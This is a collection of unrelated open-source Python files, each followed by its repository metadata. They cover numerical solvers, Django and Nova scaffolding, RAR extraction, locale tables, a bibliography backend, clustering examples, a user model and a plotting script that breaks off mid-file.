from __future__ import division, print_function, absolute_import __docformat__ = "restructuredtext en" __all__ = [] from numpy import asanyarray, asarray, asmatrix, array, matrix, zeros from scipy.sparse.linalg.interface import aslinearoperator, LinearOperator, \ IdentityOperator _coerce_rules = {('f','f'):'f', ('f','d'):'d', ('f','F'):'F', ('f','D'):'D', ('d','f'):'d', ('d','d'):'d', ('d','F'):'D', ('d','D'):'D', ('F','f'):'F', ('F','d'):'D', ('F','F'):'F', ('F','D'):'D', ('D','f'):'D', ('D','d'):'D', ('D','F'):'D', ('D','D'):'D'} def coerce(x,y): if x not in 'fdFD': x = 'd' if y not in 'fdFD': y = 'd' return _coerce_rules[x,y] def id(x): return x def make_system(A, M, x0, b): """Make a linear system Ax=b Parameters ---------- A : LinearOperator sparse or dense matrix (or any valid input to aslinearoperator) M : {LinearOperator, Nones} preconditioner sparse or dense matrix (or any valid input to aslinearoperator) x0 : {array_like, None} initial guess to iterative method b : array_like right hand side Returns ------- (A, M, x, b, postprocess) A : LinearOperator matrix of the linear system M : LinearOperator preconditioner x : rank 1 ndarray initial guess b : rank 1 ndarray right hand side postprocess : function converts the solution vector to the appropriate type and dimensions (e.g. (N,1) matrix) """ A_ = A A = aslinearoperator(A) if A.shape[0] != A.shape[1]: raise ValueError('expected square matrix, but got shape=%s' % (A.shape,)) N = A.shape[0] b = asanyarray(b) if not (b.shape == (N,1) or b.shape == (N,)): raise ValueError('A and b have incompatible dimensions') if b.dtype.char not in 'fdFD': b = b.astype('d') # upcast non-FP types to double def postprocess(x): if isinstance(b,matrix): x = asmatrix(x) return x.reshape(b.shape) if hasattr(A,'dtype'): xtype = A.dtype.char else: xtype = A.matvec(b).dtype.char xtype = coerce(xtype, b.dtype.char) b = asarray(b,dtype=xtype) # make b the same type as x b = b.ravel() if x0 is None: x = zeros(N, dtype=xtype) else: x = array(x0, dtype=xtype) if not (x.shape == (N,1) or x.shape == (N,)): raise ValueError('A and x have incompatible dimensions') x = x.ravel() # process preconditioner if M is None: if hasattr(A_,'psolve'): psolve = A_.psolve else: psolve = id if hasattr(A_,'rpsolve'): rpsolve = A_.rpsolve else: rpsolve = id if psolve is id and rpsolve is id: M = IdentityOperator(shape=A.shape, dtype=A.dtype) else: M = LinearOperator(A.shape, matvec=psolve, rmatvec=rpsolve, dtype=A.dtype) else: M = aslinearoperator(M) if A.shape != M.shape: raise ValueError('matrix and preconditioner have different shapes') return A, M, x, b, postprocess
Eric89GXL/scipy
scipy/sparse/linalg/isolve/utils.py
Python
bsd-3-clause
3,337
""" Django settings for paypal_demo project. Generated by 'django-admin startproject' using Django 1.8. For more information on this file, see https://docs.djangoproject.com/en/1.8/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.8/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'gt^xy(p!5wcff5@zy#^cnvuz9ry#-#g$59du41x@a!l=#)3q6+' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'paypal_demo', ] MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'django.middleware.security.SecurityMiddleware', ) ROOT_URLCONF = 'paypal_demo.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'paypal_demo.wsgi.application' # Database # https://docs.djangoproject.com/en/1.8/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Internationalization # https://docs.djangoproject.com/en/1.8/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.8/howto/static-files/ STATIC_URL = '/static/' #PayPal Settings INSTALLED_APPS.append('paypal.standard.ipn') PAYPAL_RECEIVER_EMAIL = "sandbox@neutrondrive.com"
pizzapanther/Getting-Paid-With-Python
paypal_demo/paypal_demo/settings.py
Python
mit
2,758
# Copyright 2013 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import collections import functools import threading import oslo_messaging as messaging from oslo_serialization import jsonutils from nova import rpc SUBSCRIBERS = collections.defaultdict(threading.Event) NOTIFICATIONS = [] VERSIONED_NOTIFICATIONS = [] def reset(): del NOTIFICATIONS[:] del VERSIONED_NOTIFICATIONS[:] SUBSCRIBERS.clear() FakeMessage = collections.namedtuple('Message', ['publisher_id', 'priority', 'event_type', 'payload', 'context']) class FakeNotifier(object): def __init__(self, transport, publisher_id, serializer=None): self.transport = transport self.publisher_id = publisher_id self._serializer = serializer or messaging.serializer.NoOpSerializer() for priority in ['debug', 'info', 'warn', 'error', 'critical']: setattr(self, priority, functools.partial(self._notify, priority.upper())) def prepare(self, publisher_id=None): if publisher_id is None: publisher_id = self.publisher_id return self.__class__(self.transport, publisher_id, serializer=self._serializer) def _notify(self, priority, ctxt, event_type, payload): payload = self._serializer.serialize_entity(ctxt, payload) # NOTE(sileht): simulate the kombu serializer # this permit to raise an exception if something have not # been serialized correctly jsonutils.to_primitive(payload) # NOTE(melwitt): Try to serialize the context, as the rpc would. # An exception will be raised if something is wrong # with the context. self._serializer.serialize_context(ctxt) msg = FakeMessage(self.publisher_id, priority, event_type, payload, ctxt) NOTIFICATIONS.append(msg) def is_enabled(self): return True class FakeVersionedNotifier(FakeNotifier): def _notify(self, priority, ctxt, event_type, payload): payload = self._serializer.serialize_entity(ctxt, payload) notification = {'publisher_id': self.publisher_id, 'priority': priority, 'event_type': event_type, 'payload': payload} VERSIONED_NOTIFICATIONS.append(notification) _notify_subscribers(notification) def stub_notifier(test): test.stub_out('oslo_messaging.Notifier', FakeNotifier) if rpc.LEGACY_NOTIFIER and rpc.NOTIFIER: test.stub_out('nova.rpc.LEGACY_NOTIFIER', FakeNotifier(rpc.LEGACY_NOTIFIER.transport, rpc.LEGACY_NOTIFIER.publisher_id, serializer=getattr(rpc.LEGACY_NOTIFIER, '_serializer', None))) test.stub_out('nova.rpc.NOTIFIER', FakeVersionedNotifier(rpc.NOTIFIER.transport, rpc.NOTIFIER.publisher_id, serializer=getattr(rpc.NOTIFIER, '_serializer', None))) def wait_for_versioned_notification(event_type, timeout=1.0): # NOTE: The event stored in SUBSCRIBERS is not used for synchronizing # the access to shared state as there is no parallel access to # SUBSCRIBERS because the only parallelism is due to eventlet. # The event is simply used to avoid polling the list of received # notifications return SUBSCRIBERS[event_type].wait(timeout) def _notify_subscribers(notification): SUBSCRIBERS[notification['event_type']].set()
rajalokan/nova
nova/tests/unit/fake_notifier.py
Python
apache-2.0
4,395
#!/usr/bin/env python from pyfi.calendar.calendar.object import Calendar __all__ = ['Calendar']
rlinguri/pyfi
pyfi/calendar/calendar/__init__.py
Python
mit
98
from django import forms from connect.accounts.models import Role, Skill class FilterMemberForm(forms.Form): """ Form for searching for members by their skills and roles. """ skills = forms.ModelMultipleChoiceField( queryset=Skill.objects.all(), widget=forms.CheckboxSelectMultiple(), required=False) roles = forms.ModelMultipleChoiceField( queryset=Role.objects.all(), widget=forms.CheckboxSelectMultiple(), required=False)
nlhkabu/connect
connect/discover/forms.py
Python
bsd-3-clause
497
# Fuck you Disyer. Stealing my fucking paypal. GET FUCKED: toontown.coghq.CashbotMintGearRoom_Battle01_Cogs from panda3d.core import Point3 from SpecImports import * from toontown.toonbase import ToontownGlobals CogParent = 10000 BattleCellId = 0 BattleCells = {BattleCellId: {'parentEntId': CogParent, 'pos': Point3(0, 0, 0)}} CogData = [{'parentEntId': CogParent, 'boss': 1, 'level': ToontownGlobals.CashbotMintBossLevel, 'battleCell': BattleCellId, 'pos': Point3(-6, 0, 0), 'h': 180, 'behavior': 'stand', 'path': None, 'skeleton': 1}, {'parentEntId': CogParent, 'boss': 0, 'level': ToontownGlobals.CashbotMintCogLevel + 1, 'battleCell': BattleCellId, 'pos': Point3(-2, 0, 0), 'h': 180, 'behavior': 'stand', 'path': None, 'skeleton': 0}, {'parentEntId': CogParent, 'boss': 0, 'level': ToontownGlobals.CashbotMintCogLevel + 1, 'battleCell': BattleCellId, 'pos': Point3(2, 0, 0), 'h': 180, 'behavior': 'stand', 'path': None, 'skeleton': 0}, {'parentEntId': CogParent, 'boss': 0, 'level': ToontownGlobals.CashbotMintCogLevel + 1, 'battleCell': BattleCellId, 'pos': Point3(6, 0, 0), 'h': 180, 'behavior': 'stand', 'path': None, 'skeleton': 0}] ReserveCogData = []
DedMemez/ODS-August-2017
coghq/CashbotMintGearRoom_Battle01_Cogs.py
Python
apache-2.0
1,288
# Copyright (c) 2003-2005 Jimmy Retzlaff, 2008 Konstantin Yegupov # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # Unix version uses unrar command line executable import subprocess import gc import os, os.path import time, re from rar_exceptions import * class UnpackerNotInstalled(Exception): pass rar_executable_cached = None rar_executable_version = None def call_unrar(params): "Calls rar/unrar command line executable, returns stdout pipe" global rar_executable_cached if rar_executable_cached is None: for command in ('unrar', 'rar'): try: subprocess.Popen([command], stdout=subprocess.PIPE) rar_executable_cached = command break except OSError: pass if rar_executable_cached is None: raise UnpackerNotInstalled("No suitable RAR unpacker installed") assert type(params) == list, "params must be list" args = [rar_executable_cached] + params try: gc.disable() # See http://bugs.python.org/issue1336 return subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) finally: gc.enable() class RarFileImplementation(object): def init(self, password=None): global rar_executable_version self.password = password proc = self.call('v', []) stdoutdata, stderrdata = proc.communicate() # Use unrar return code if available self._check_returncode(proc.returncode) for line in stderrdata.splitlines(): if line.strip().startswith("Cannot open"): raise FileOpenError if line.find("CRC failed")>=0: raise IncorrectRARPassword accum = [] source = iter(stdoutdata.splitlines()) line = '' while (line.find('RAR ') == -1): line = source.next() signature = line # The code below is mighty flaky # and will probably crash on localized versions of RAR # but I see no safe way to rewrite it using a CLI tool if signature.find("RAR 4") > -1: rar_executable_version = 4 while not (line.startswith('Comment:') or line.startswith('Pathname/Comment')): if line.strip().endswith('is not RAR archive'): raise InvalidRARArchive line = source.next() while not line.startswith('Pathname/Comment'): accum.append(line.rstrip('\n')) line = source.next() if len(accum): accum[0] = accum[0][9:] # strip out "Comment:" part self.comment = '\n'.join(accum[:-1]) else: self.comment = None elif signature.find("RAR 5") > -1: rar_executable_version = 5 line = source.next() while not line.startswith('Archive:'): if line.strip().endswith('is not RAR archive'): raise InvalidRARArchive accum.append(line.rstrip('\n')) line = source.next() if len(accum): self.comment = '\n'.join(accum[:-1]).strip() else: self.comment = None else: raise UnpackerNotInstalled("Unsupported RAR version, expected 4.x or 5.x, found: " + signature.split(" ")[1]) def escaped_password(self): return '-' if self.password == None else self.password def call(self, cmd, options=[], files=[]): options2 = options + ['p'+self.escaped_password()] soptions = ['-'+x for x in options2] return call_unrar([cmd]+soptions+['--',self.archiveName]+files) def infoiter(self): command = "v" if rar_executable_version == 4 else "l" proc = self.call(command, ['c-']) stdoutdata, stderrdata = proc.communicate() # Use unrar return code if available self._check_returncode(proc.returncode) for line in stderrdata.splitlines(): if line.strip().startswith("Cannot open"): raise FileOpenError accum = [] source = iter(stdoutdata.splitlines()) line = '' while not line.startswith('-----------'): if line.strip().endswith('is not RAR archive'): raise InvalidRARArchive if line.startswith("CRC failed") or line.startswith("Checksum error") or line.startswith("checksum error"): raise IncorrectRARPassword line = source.next() line = source.next() i = 0 re_spaces = re.compile(r"\s+") if rar_executable_version == 4: while not line.startswith('-----------'): accum.append(line) if len(accum)==2: data = {} data['index'] = i # asterisks mark password-encrypted files data['filename'] = accum[0].strip().lstrip("*") # asterisks marks password-encrypted files fields = re_spaces.split(accum[1].strip()) data['size'] = int(fields[0]) attr = fields[5] data['isdir'] = 'd' in attr.lower() data['datetime'] = time.strptime(fields[3]+" "+fields[4], '%d-%m-%y %H:%M') data['comment'] = None data['volume'] = None yield data accum = [] i += 1 line = source.next() elif rar_executable_version == 5: while not line.startswith('-----------'): fields = line.strip().lstrip("*").split() data = {} data['index'] = i data['filename'] = " ".join(fields[4:]) data['size'] = int(fields[1]) attr = fields[0] data['isdir'] = 'd' in attr.lower() data['datetime'] = time.strptime(fields[2]+" "+fields[3], '%d-%m-%y %H:%M') data['comment'] = None data['volume'] = None yield data i += 1 line = source.next() def read_files(self, checker): res = [] for info in self.infoiter(): checkres = checker(info) if checkres==True and not info.isdir: pipe = self.call('p', ['inul'], [info.filename]).stdout res.append((info, pipe.read())) return res def extract(self, checker, path, withSubpath, overwrite): res = [] command = 'x' if not withSubpath: command = 'e' options = [] if overwrite: options.append('o+') else: options.append('o-') if not path.endswith(os.sep): path += os.sep names = [] for info in self.infoiter(): checkres = checker(info) if type(checkres) in [str, unicode]: raise NotImplementedError("Condition callbacks returning strings are deprecated and only supported in Windows") if checkres==True and not info.isdir: names.append(info.filename) res.append(info) names.append(path) proc = self.call(command, options, names) stdoutdata, stderrdata = proc.communicate() # Use unrar return code if available self._check_returncode(proc.returncode) if stderrdata.find("CRC failed")>=0 or stderrdata.find("Checksum error")>=0 or stderrdata.find("checksum error")>=0: raise CRCRARError if stderrdata.find("No files to extract")>=0: raise NoFileToExtract if stderrdata.find("Bad archive")>=0: raise FatalRARError return res def _check_returncode(self, returncode): # RAR exit code from unrarsrc-5.2.1.tar.gz/errhnd.hpp RARX_SUCCESS = 0 RARX_WARNING = 1 RARX_FATAL = 2 RARX_CRC = 3 RARX_LOCK = 4 RARX_WRITE = 5 RARX_OPEN = 6 RARX_USERERROR = 7 RARX_MEMORY = 8 RARX_CREATE = 9 RARX_NOFILES = 10 RARX_BADPWD = 11 RARX_USERBREAK = 255 if returncode != RARX_SUCCESS: if returncode == RARX_FATAL: raise FatalRARError elif returncode == RARX_CRC: raise CRCRARError elif returncode == RARX_BADPWD: raise IncorrectRARPassword elif returncode == RARX_NOFILES: raise NoFileToExtract else: raise GenericRARError def destruct(self): pass def get_volume(self): command = "v" if rar_executable_version == 4 else "l" stdoutdata, stderrdata = self.call(command, ['c-']).communicate() for line in stderrdata.splitlines(): if line.strip().startswith("Cannot open"): raise FileOpenError source = iter(stdoutdata.splitlines()) line = '' while not line.startswith('-----------'): if line.strip().endswith('is not RAR archive'): raise InvalidRARArchive if line.startswith("CRC failed") or line.startswith("Checksum error"): raise IncorrectRARPassword line = source.next() line = source.next() if rar_executable_version == 4: while not line.startswith('-----------'): line = source.next() line = source.next() items = line.strip().split() if len(items)>4 and items[4]=="volume": return int(items[5]) - 1 else: return None elif rar_executable_version == 5: while not line.startswith('-----------'): line = source.next() line = source.next() items = line.strip().split() if items[1]=="volume": return int(items[2]) - 1 else: return None
keen99/SickRage
lib/unrar2/unix.py
Python
gpl-3.0
11,433
"""Localizations for meas_date extraction.""" # Authors: Eric Larson <larson.eric.d@gmail.com> # # License: BSD-3-Clause # This file was generated on 2021/01/31 on an Ubuntu system. # When getting "unsupported locale setting" on Ubuntu (e.g., with localepurge), # use "sudo locale-gen de_DE" etc. then "sudo update-locale". """ import datetime import locale print('_localized_abbr = {') for loc in ('en_US.utf8', 'de_DE', 'fr_FR', 'it_IT'): print(f' {repr(loc)}: {{') print(' "month": {', end='') month_abbr = set() for month in range(1, 13): # Month as locale’s abbreviated name locale.setlocale(locale.LC_TIME, "en_US.utf8") dt = datetime.datetime(year=2000, month=month, day=1) val = dt.strftime("%b").lower() locale.setlocale(locale.LC_TIME, loc) key = dt.strftime("%b").lower() month_abbr.add(key) print(f'{repr(key)}: {repr(val)}, ', end='') print('}, # noqa') print(' "weekday": {', end='') weekday_abbr = set() for day in range(1, 8): # Weekday as locale’s abbreviated name. locale.setlocale(locale.LC_TIME, "en_US.utf8") dt = datetime.datetime(year=2000, month=1, day=day) val = dt.strftime("%a").lower() locale.setlocale(locale.LC_TIME, loc) key = dt.strftime("%a").lower() assert key not in weekday_abbr, key weekday_abbr.add(key) print(f'{repr(key)}: {repr(val)}, ', end='') print('}, # noqa') print(' },') print('}\n') """ _localized_abbr = { 'en_US.utf8': { "month": {'jan': 'jan', 'feb': 'feb', 'mar': 'mar', 'apr': 'apr', 'may': 'may', 'jun': 'jun', 'jul': 'jul', 'aug': 'aug', 'sep': 'sep', 'oct': 'oct', 'nov': 'nov', 'dec': 'dec', }, # noqa "weekday": {'sat': 'sat', 'sun': 'sun', 'mon': 'mon', 'tue': 'tue', 'wed': 'wed', 'thu': 'thu', 'fri': 'fri', }, # noqa }, 'de_DE': { "month": {'jan': 'jan', 'feb': 'feb', 'mär': 'mar', 'apr': 'apr', 'mai': 'may', 'jun': 'jun', 'jul': 'jul', 'aug': 'aug', 'sep': 'sep', 'okt': 'oct', 'nov': 'nov', 'dez': 'dec', }, # noqa "weekday": {'sa': 'sat', 'so': 'sun', 'mo': 'mon', 'di': 'tue', 'mi': 'wed', 'do': 'thu', 'fr': 'fri', }, # noqa }, 'fr_FR': { "month": {'janv.': 'jan', 'févr.': 'feb', 'mars': 'mar', 'avril': 'apr', 'mai': 'may', 'juin': 'jun', 'juil.': 'jul', 'août': 'aug', 'sept.': 'sep', 'oct.': 'oct', 'nov.': 'nov', 'déc.': 'dec', }, # noqa "weekday": {'sam.': 'sat', 'dim.': 'sun', 'lun.': 'mon', 'mar.': 'tue', 'mer.': 'wed', 'jeu.': 'thu', 'ven.': 'fri', }, # noqa }, 'it_IT': { "month": {'gen': 'jan', 'feb': 'feb', 'mar': 'mar', 'apr': 'apr', 'mag': 'may', 'giu': 'jun', 'lug': 'jul', 'ago': 'aug', 'set': 'sep', 'ott': 'oct', 'nov': 'nov', 'dic': 'dec', }, # noqa "weekday": {'sab': 'sat', 'dom': 'sun', 'lun': 'mon', 'mar': 'tue', 'mer': 'wed', 'gio': 'thu', 'ven': 'fri', }, # noqa }, }
wmvanvliet/mne-python
mne/io/nirx/_localized_abbr.py
Python
bsd-3-clause
2,966
# Copyright (c) 2008, 2009, 2010, 2011 Andrey Golovizin # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY # CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, # TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE # SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. from xml.sax.saxutils import escape from pybtex.backends import BaseBackend import pybtex.io file_extension = 'html' PROLOGUE = u"""<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html> <head><meta name="generator" content="Pybtex"> <meta http-equiv="Content-Type" content="text/html; charset=%s"> <title>Bibliography</title> </head> <body> <dl> """ class Backend(BaseBackend): name = 'html' suffixes = '.html', symbols = { 'ndash': u'&ndash;', 'newblock': u'\n', 'nbsp': u'&nbsp;' } tags = { 'emph': u'em', } def format_text(self, text): return escape(text) def format_tag(self, tag_name, text): tag = self.tags[tag_name] return ur'<%s>%s</%s>' % (tag, text, tag) def write_prologue(self, maxlen): encoding = self.encoding or pybtex.io.get_default_encoding() self.output(PROLOGUE % encoding) def write_epilogue(self): self.output(u'</dl></body></html>\n') def write_entry(self, key, label, text): self.output(u'<dt>%s</dt>\n' % label) self.output(u'<dd>%s</dd>\n' % text)
rybesh/pybtex
pybtex/backends/html.py
Python
mit
2,255
"""! @brief Examples of usage and demonstration of abilities of BSAS algorithm in cluster analysis. @authors Andrei Novikov (pyclustering@yandex.ru) @date 2014-2020 @copyright BSD-3-Clause """ from pyclustering.cluster import cluster_visualizer; from pyclustering.cluster.bsas import bsas, bsas_visualizer; from pyclustering.samples.definitions import SIMPLE_SAMPLES; from pyclustering.utils import read_sample; from pyclustering.utils.metric import distance_metric, type_metric; def template_clustering(path, amount, threshold, **kwargs): metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE)); ccore = kwargs.get('ccore', False); draw = kwargs.get('draw', True); sample = read_sample(path); print("Sample: ", path); bsas_instance = bsas(sample, amount, threshold, ccore=ccore, metric=metric); bsas_instance.process(); clusters = bsas_instance.get_clusters(); representatives = bsas_instance.get_representatives(); if draw is True: bsas_visualizer.show_clusters(sample, clusters, representatives); def cluster_sample1(): template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0); def cluster_sample2(): template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 1.0); def cluster_sample3(): template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, 1.0); def cluster_sample4(): template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 5, 1.0); def cluster_sample5(): template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 4, 1.0); def cluster_sample6(): template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, 2, 1.0); def cluster_elongate(): template_clustering(SIMPLE_SAMPLES.SAMPLE_ELONGATE, 2, 1.0); cluster_sample1(); cluster_sample2(); cluster_sample3(); cluster_sample4(); cluster_sample5(); cluster_sample6(); cluster_elongate();
annoviko/pyclustering
pyclustering/cluster/examples/bsas_examples.py
Python
gpl-3.0
1,836
# -*- coding: utf-8 -*- # Generated by Django 1.9.7 on 2016-07-11 18:40 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('ipam', '0001_initial'), ('dcim', '0005_auto_20160706_1722'), ] operations = [ migrations.AddField( model_name='device', name='primary_ip4', field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='primary_ip4_for', to='ipam.IPAddress', verbose_name=b'Primary IPv4'), ), migrations.AddField( model_name='device', name='primary_ip6', field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='primary_ip6_for', to='ipam.IPAddress', verbose_name=b'Primary IPv6'), ), ]
digitalocean/netbox
netbox/dcim/migrations/0006_add_device_primary_ip4_ip6.py
Python
apache-2.0
914
# coding: utf-8 from __future__ import absolute_import import hashlib from flask.ext.babel import lazy_gettext as _ from google.appengine.ext import ndb from api import fields import model import util import config class User(model.Base): name = ndb.StringProperty(required=True, verbose_name=_('Name')) username = ndb.StringProperty(required=True, verbose_name=_('Username')) email = ndb.StringProperty(default='', verbose_name=_('Email')) locale = ndb.StringProperty(default='', verbose_name=_('Language')) auth_ids = ndb.StringProperty(repeated=True) active = ndb.BooleanProperty(default=True, verbose_name=_('Active')) admin = ndb.BooleanProperty(default=False, verbose_name=_('Admin')) permissions = ndb.StringProperty(repeated=True, verbose_name=_('Permissions')) verified = ndb.BooleanProperty(default=False, verbose_name=_('Verified')) token = ndb.StringProperty(default='') password_hash = ndb.StringProperty(default='') def has_permission(self, perm): return self.admin or perm in self.permissions def avatar_url_size(self, size=None): return '//gravatar.com/avatar/%(hash)s?d=identicon&r=x%(size)s' % { 'hash': hashlib.md5( (self.email or self.username).encode('utf-8')).hexdigest(), 'size': '&s=%d' % size if size > 0 else '', } avatar_url = property(avatar_url_size) @classmethod def get_dbs( cls, admin=None, active=None, verified=None, permissions=None, **kwargs ): return super(User, cls).get_dbs( admin=admin or util.param('admin', bool), active=active or util.param('active', bool), verified=verified or util.param('verified', bool), permissions=permissions or util.param('permissions', list), **kwargs ) @classmethod def is_username_available(cls, username, self_key=None): if self_key is None: return cls.get_by('username', username) is None user_keys, _ = util.get_keys(cls.query(), username=username, limit=2) return not user_keys or self_key in user_keys and not user_keys[1:] @classmethod def is_email_available(cls, email, self_key=None): if not config.CONFIG_DB.check_unique_email: return True user_keys, _ = util.get_keys( cls.query(), email=email, verified=True, limit=2, ) return not user_keys or self_key in user_keys and not user_keys[1:] FIELDS = { 'active': fields.Boolean, 'admin': fields.Boolean, 'auth_ids': fields.List(fields.String), 'avatar_url': fields.String, 'email': fields.String, 'locale': fields.String, 'name': fields.String, 'permissions': fields.List(fields.String), 'username': fields.String, 'verified': fields.Boolean, } FIELDS.update(model.Base.FIELDS)
mdxs/gae-init-babel
main/model/user.py
Python
mit
2,779
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2011 Justin Santa Barbara # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova.api.openstack.compute import extensions from nova import flags from nova.log import logging from nova.tests.integrated import integrated_helpers FLAGS = flags.FLAGS LOG = logging.getLogger(__name__) class ExtensionsTest(integrated_helpers._IntegratedTestBase): def _get_flags(self): f = super(ExtensionsTest, self)._get_flags() f['osapi_compute_extension'] = FLAGS.osapi_compute_extension[:] f['osapi_compute_extension'].append( 'nova.tests.api.openstack.compute.extensions.' 'foxinsocks.Foxinsocks') return f def test_get_foxnsocks(self): """Simple check that fox-n-socks works.""" response = self.api.api_request('/foxnsocks') foxnsocks = response.read() LOG.debug("foxnsocks: %s" % foxnsocks) self.assertEqual('Try to say this Mr. Knox, sir...', foxnsocks)
sileht/deb-openstack-nova
nova/tests/integrated/test_extensions.py
Python
apache-2.0
1,560
import sys import numpy as np import matplotlib.pyplot as plt import matplotlib from matplotlib.ticker import FuncFormatter cdict = {'red': [(0.0, 0.0, 0.0), (0.33, 0.0, 0.0), (0.66, 1.0, 1.0), (1.0, 1.0, 1.0)], 'blue': [(0.0, 0.0, 0.0), (0.33, 1.0, 1.0), (0.66, 0.0, 0.0), (1.0, 0.0, 0.0)], 'green': [(0.0, 0.0, 0.0), (0.33, 0.0, 0.0), (0.66, 0.0, 0.0), (1.0, 1.0, 1.0)]} my_cmap = matplotlib.colors.LinearSegmentedColormap('my_colormap', cdict, 256) def scale(x, pos): 'The two args are the value and tick position' return '%1.1f' % (x / 100.0) def scale2(x, pos): 'The two args are the value and tick position' return '%1.1f' % (x / 100.0) size = int(sys.argv[2]) x, y, z = np.loadtxt(sys.argv[1]).T data = np.zeros((size, size)) m = 0 x_m = 0 y_m = 0 for i in range(0, len(z)): data[round(x[i] * size), round(y[i] * size)] = z[i] if z[i] > m: x_m = round(x[i] * size) y_m = round(y[i] * size) m = z[i] data = np.ma.masked_where(data == 0, data) print "best:"+str(max(z)) def load_points(fname): p_z, p_y, p_x = np.loadtxt(fname).T p_x *= size p_y *= size p_p_x = [] p_p_y = [] np_p_x = [] np_p_y = [] for i in range(0, len(p_x)): if p_z[i] == 1.0: p_p_x += [p_x[i]] p_p_y += [p_y[i]] else: np_p_x += [p_x[i]] np_p_y += [p_y[i]] return p_p_x, p_p_y, np_p_x, np_p_y fig = plt.figure() im = plt.imshow(data.T, origin='lower', cmap=my_cmap) im.set_interpolation('nearest') fig.subplots_adjust(top=0.98) cb = plt.colorbar() for t in cb.ax.get_xticklabels(): t.set_fontsize(130) ax = fig.add_subplot(111) ax.yaxis.set_major_formatter(FuncFormatter(scale)) 